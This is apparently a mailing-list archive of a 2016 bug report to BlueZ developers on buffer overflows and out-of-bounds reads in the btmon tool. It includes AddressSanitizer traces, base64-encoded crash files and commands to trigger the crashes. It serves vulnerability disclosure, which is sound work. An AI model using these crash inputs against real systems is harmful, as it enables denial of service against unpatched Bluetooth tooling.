>> 00 00 00 00 00 00 00 00 00 00 00 00 f0 ef 00 00 ...............=
.
>> 20 60 00 00 00 00 00 00 00 00 00 00 00 c8 36 16 `............6=
.
>> fe 79 00 00 c7 6d 61 21 54 70 00 00 01 00 00 00 .y...ma!Tp.....=
.
>> : #0 0x42cb3b in packet_hexdump monitor/packet.c:3744
>> #1 0x47dd2b in packet_hexdump monitor/packet.c:3740
>> #2 0x47dd2b in packet_hci_acldata monitor/packet.c:9108
>> #3 0x483752 in packet_monitor monitor/packet.c:3849
>> #4 0x417f68 in control_reader monitor/control.c:1415
>> #5 0x40a142 in main monitor/main.c:220
>> #6 0x705420199b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.s=
o.6+0x21b44)
>> #7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x79fe1636c7e2 is located in stack of thread T0 at offset 1778 i=
n frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <=3D=3D Memory access at offset 1778 overflows thi=
s variable
>> HINT: this may be a false positive if your program uses some custom stac=
k unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:3744 p=
acket_hexdump
>> Shadow bytes around the buggy address:
>> 0x0f4042c658a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c658e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =3D>0x0f4042c658f0: 00 00 00 00 00 00 00 00 00 00 00 00[02]f4 f3 f3
>> 0x0f4042c65900: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c65910: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c65920: 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00
>> 0x0f4042c65930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0f4042c65940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> =3D=3D13306=3D=3DABORTING
>>
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=3Daddress
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> An buffer overflow was observed in "pklg_read_hci" function in "btsnoop.=
c" source file. This issue can be triggered by processing a corrupted dump =
file and will result in hcidump crash. To replicate this issue use the atta=
ched sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>>
>> PoC.file base64 encoded:
>>
>> AAAQABkQAKLNFQCAAgICFwIXAAEABU5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5O=
Tk5O
>> Tk5OTqGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh=
oaGh
>> oU5OTk5OTk5OTk5OTk5dTgAAdXV1dXV1dXV1dXV1dXV1MyQ+Plj7AbrYA4QBABIgPj08Gjq6=
AAME
>> AQC62AMEAQAwPkc+WgABABAD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAECP=
lNOA
>> AAEAEj5NPlgC/4AA9gQBABI+PgEAAAC6AAMEAT4+AQAAALoAAwQB/3///z5YAAEfAA7mAQA+=
CAQa
>> Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+Plga=
PrrY
>> AwQBACKdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBADMkPj5YAAG62AOE=
AQAS
>> ID49PBo6ugADBAEAutgDBAEAMD5HPloAAQAQA9wBAD4ABBo+Lj66ABAfAAPmAQABAAQWcHBw=
cHBw
>> cP//f/9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT71PT09PT4D/T09PT09P=
D09P
>> T09PT09PT09PT09PT09PT09PT09PT09PT09RT09PUk9PT09PT09PT09PT09PT0////8ABAkE=
AiAA
>> KgUZEACizRUVNAICABI+PgEAAAC6CQMEAf9///8+WAABHwAO5gEAPggEGj4aPrrYAwQBAE0+=
Pj5Y
>> AAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwT1ABI+Pj5YGj662AMEAQBDnQAAAQA+=
CAQa
>> Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+Plga=
PrrY
>> AwQBAEOdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBABgaProAAwQBABIk=
Pj5Y
>> Gj662AMEAQD/fwAADBo+AAAAAQEAMyQ+PlgAAbrYA4QBABIgPj08Gjq6AAMEDwC62AMEAQAw=
Pkc+
>> WgABABwD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAEBPT09PT09PT09PT09P=
T09P
>> T09PT09PT08DhAEAEiA+PTwaOroAAwQBALrYAwQBADA+Rz5aAAEAEAPcAQA+j5TTgAABABI+=
TT5Y
>> Av+AAPYEAQASPj4BAAAAugADBAEAED4+PlgWAR8ADuYBAD4IBBo+Gj662E5OTk5OTk5dTk51=
dXV1
>> dXV1dXV1dXV1dXV1dXV1dXV1dXVOTk5OTk5OTk5OTk5OTk5OTk5OTugLAAAC////fwIXAAGA=
////
>> AAQJBAIgACoFGRAAnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ1AnZ2dnZ2dnZ2dnZ2dnZ2d=
nZ2d
>> nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ0AAAC6AAMEAQAQPj4+WAABH09P=
T09P
>> T09PT08PT09PT09PT09PT09PT09PT09PT09PT3BwcHBwcJJwcHBwiHBwcHDucHBwcHBwcHBw=
cHBw
>> cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwEHBwcHBwcHBwcHBwcHBwcHBw=
T3Bw
>> cAIgACoFGRAAos0VFTQCAgAgPj4BAAAAugADBAH/f///PlgAAR8ADuYBAD4IBHBwPgAZGj5w=
cHBw
>> cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBoADuYBAD4IBHBwPgAZGj5w=
cHBw
>> cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBo+ugADBAEAEiA+Plj///9/=
EAQB
>> ABI+TVgGProAAwQBABI+Pj5YJAAQQA=3D=3D
>>
>>
>>
>> Affected code:
>>
>> 368 *index =3D 0xffff;
>> 369 *opcode =3D 0xffff;
>> 370 break;
>> 371 }
>> 372
>> 373 len =3D read(btsnoop->fd, data, toread);
>> 374 if (len < 0) {
>> 375 btsnoop->aborted =3D true;
>> 376 return false;
>> 377 }
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to compiled with -fsanitize=3Daddress for this=
):
>>
>> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>> =3D=3D1986=3D=3DERROR: AddressSanitizer: stack-buffer-overflow on addres=
s 0x73f4d87b94c2 at pc 0x663b1aef59b6 bp 0x73f4d87b8c50 sp 0x73f4d87b8c38
>> WRITE of size 1491 at 0x73f4d87b94c2 thread T0
>> #0 0x663b1aef59b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x=
299b5)
>> #1 0x544a17 in pklg_read_hci src/shared/btsnoop.c:373
>> #2 0x544a17 in btsnoop_read_hci src/shared/btsnoop.c:433
>> #3 0x417efd in control_reader monitor/control.c:1408
>> #4 0x40a142 in main monitor/main.c:220
>> #5 0x663b1a933b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.s=
o.6+0x21b44)
>> #6 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x73f4d87b94c2 is located in stack of thread T0 at offset 1778 i=
n frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <=3D=3D Memory access at offset 1778 overflows thi=
s variable
>> HINT: this may be a false positive if your program uses some custom stac=
k unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 read
>> Shadow bytes around the buggy address:
>> 0x0e7f1b0ef240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =3D>0x0e7f1b0ef290: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
>> 0x0e7f1b0ef2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
>> 0x0e7f1b0ef2b0: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef2c0: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0e7f1b0ef2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> =3D=3D1986=3D=3DABORTING
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=3Daddress
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> A out-of-bound read was identified in "print_hex_field" function in "mon=
itor/packet.c" source file. This issue can be triggered by processing a cor=
rupted dump file and will result in hcidump crash. To replicate this issue =
use the attached sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>> PoC.file base64 encoded:
>>
>> AAAADCQkLv9/AIAAARUB3QAAAAwdJCT/f4gAAQE=3D
>>
>>
>>
>> Affected code:
>>
>> 1908 static void print_hex_field(const char *label, const uint8_t *data=
,
>> 1909 ui=
nt8_t le n)
>> 1910 {
>> 1911 char str[len * 2 + 1];
>> 1912 uint8_t i;
>> 1913
>> 1914 str[0] =3D '\0';
>> 1915
>> 1916 for (i =3D 0; i < len; i++)
>> 1917 sprintf(str + (i * 2), "%2.2x", data[i]);
>> 1918
>>
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to compiled with -fsanitize=3Daddress for this=
):
>>
>> =3D=3D17737=3D=3DERROR: AddressSanitizer: stack-buffer-overflow on addre=
ss 0x77c32d2411a2 at pc 0x431421 bp 0x77c32d240700 sp 0x77c32d2406f8
>> READ of size 1 at 0x77c32d2411a2 thread T0
>> #0 0x431420 in print_hex_field monitor/packet.c:1917
>> #1 0x44428d in print_key monitor/packet.c:1924
>> #2 0x44428d in print_link_key monitor/packet.c:1929
>> #3 0x44428d in return_link_keys_evt monitor/packet.c:7803
>> #4 0x47d5f8 in packet_hci_event monitor/packet.c:9072
>> #5 0x483025 in packet_monitor monitor/packet.c:3843
>> #6 0x417f68 in control_reader monitor/control.c:1415
>> #7 0x40a142 in main monitor/main.c:220
>> #8 0x74bb760f0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.s=
o.6+0x21b44)
>> #9 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x77c32d2411a2 is located in stack of thread T0 at offset 1778 i=
n frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <=3D=3D Memory access at offset 1778 overflows thi=
s variable
>> HINT: this may be a false positive if your program uses some custom stac=
k unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:1917 p=
rint_hex_field
>> Shadow bytes around the buggy address:
>> 0x0ef8e5a401e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0ef8e5a401f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0ef8e5a40200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0ef8e5a40210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0ef8e5a40220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =3D>0x0ef8e5a40230: 00 00 00 00[02]f4 f3 f3 f3 f3 00 00 00 00 00 00
>> 0x0ef8e5a40240: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00
>> 0x0ef8e5a40250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 f3
>> 0x0ef8e5a40260: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0ef8e5a40270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0ef8e5a40280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> =3D=3D17737=3D=3DABORTING
>>
>
^ permalink raw reply [flat|nested] 8+ messages in thread
end of thread, other threads:[~2016-11-15 12:12 UTC | newest]
Thread overview: 8+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2016-11-14 17:06 multiple buffer overflows and out-of-bound reads op7ic \x00
2016-11-15 9:18 ` Luiz Augusto von Dentz
2016-11-15 9:25 ` op7ic \x00
2016-11-15 10:41 ` François Beaufort
2016-11-15 10:51 ` op7ic \x00
2016-11-15 11:51 ` op7ic \x00
2016-11-15 12:01 ` Johan Hedberg
2016-11-15 12:12 ` op7ic \x00
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.